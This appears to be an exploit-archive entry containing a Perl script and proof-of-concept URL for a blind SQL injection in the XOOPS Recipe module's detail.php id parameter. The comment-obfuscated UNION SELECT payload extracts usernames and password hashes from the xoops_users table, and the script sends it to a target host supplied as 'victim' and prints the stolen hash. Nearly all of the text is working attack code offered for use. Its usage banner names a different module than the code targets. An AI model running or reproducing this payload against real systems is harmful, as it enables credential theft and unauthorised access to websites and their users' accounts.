XOOPS Module Recipe (detail.php id) Remote SQL Injection Exploit

                                                #!/usr/bin/perl -w

# Xoops All Version -Recipe- Detail.PHP (ID) Blind SQL Injection Exploit And PoC [0-day]

# Type :

# SQL Injection

# Release Date :

# {2008-04-20}

# Product / Vendor :

# www.budgiemania.com

# Bug :

# http://localhost/script/modules/recipe/detail.php?id=Sql

# PoC :

# http://localhost/script/modules/recipe/detail.php?id=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/0,0,uname,pass,111,222+from%2F%2A%2A%2Fxoops_users/**/LIMIT/**/1,1/*

# Exploit :

#############################################
#                Coded By Cr@zy_King                  http://coderx.org]#
#############################################

use IO::Socket;

if (@ARGV != 3)
{
    print "\n-----------------------------------\n";
    print "Xoops All Version -Articles- Article.PHP (ID) Blind SQL Injection ExpL0it\n";
    print "-----------------------------------\n";
    print "\n4ever Cra\n";
    print "crazy_kinq[at]hotmail.co.uk\n";
    print "http://coderx.org\n";
    print "\n-----------------------------------\n";
    print "\nKullanim: $0 <server> <path> <uid>\n";
    print "Ornek: $0 www.victim.com /path 1\n";
    print "\n-----------------------------------\n";
    exit ();
}

$server = $ARGV[0];
$path = $ARGV[1];
$uid = $ARGV[2];

$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server",  PeerPort => "80");
printf $socket ("GET %s/modules/recipe/detail.php?id=9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/0,0,uname,pass,111,222+from%2F%2A%2A%2Fxoops_users/*uid=$uid/* HTTP/1.0\nHost: %s\nAccept: */*\nConnection: close\n\n",
$path,$server,$uid);

while(<$socket>)

{
    if (/\>(\w{32})\</) { print "\nID '$uid' User Password :\n\n$1\n"; }
}

# Tested :

# All Version

# Author :

# Cr@zy_King
# http://coderx.org
# [email protected]